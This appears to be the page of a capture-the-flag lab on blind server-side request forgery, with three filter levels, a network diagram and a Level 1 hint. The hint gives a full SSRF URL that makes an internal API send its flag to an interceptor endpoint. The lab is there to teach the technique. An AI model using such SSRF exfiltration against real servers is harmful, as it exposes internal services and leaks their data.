Blind SSRF Lab

Server-Side Request Forgery with no response feedback

BLIND SSRF Challenge

This is a blind SSRF lab. The server will fetch the URL you provide, but it will NOT show you the response. You can only see whether the request was sent or blocked. Use the interceptor to detect requests and exfiltrate flags from the internal API.

Level 1 - No Filter Level 2 - Hostname Blocked Level 3 - Host + IP Blocked

Level 1 - No Filter Medium

Clue:

There is an internal API server reachable at http://blind-internal-api (IP: 172.32.0.50). It has an endpoint /exfil?level=1&target=URL that will send its flag to the given URL. You have an interceptor at http://blind-ssrf-app/interceptor/ that logs all incoming requests. Can you make the server fetch the exfil endpoint and get the flag to your interceptor?

Show Hint
Simply submit the exfil URL: http://blind-internal-api/exfil?level=1&target=http://blind-ssrf-app/interceptor/. The internal API will receive the request and send the flag to your interceptor. Check the interceptor logs to find the flag!

Submit URL

Enter a URL for the server to fetch. The response will not be shown to you.

Interceptor Endpoint

The interceptor logs all incoming requests, including exfiltrated flags. Use it as the target parameter in your exfil URL.

Interceptor URL: http://localhost:8042/interceptor/

View Logs: http://localhost:8042/interceptor/?show_logs=1

Network Topology

+-------------------------------------------------------+ | Docker Network | | | | +-------------------+ +----------------------+ | | | blind-ssrf-app | | blind-internal-api | | | | (This Server) | --> | (Internal API) | | | | Port: 8042 | | IP: 172.32.0.50 | | | | | | | | | | /interceptor/ | | /exfil?level=N | | | | /redirect?dest= | | &target=URL | | | +-------------------+ | | | | ^ | Flags: level 1, 2, 3 | | | | +----------------------+ | | | | | +--- Flag exfiltration comes back here | +-------------------------------------------------------+ | | | Your Browser --> http://localhost:8042 | | | +-------------------------------------------------------+
Level 1 Note:

No filtering is applied. All HTTP/HTTPS URLs are allowed. The internal API hostname blind-internal-api and IP 172.32.0.50 can be reached directly.

Blind SSRF Lab - CTF Challenge | Only HTTP/HTTPS protocols allowed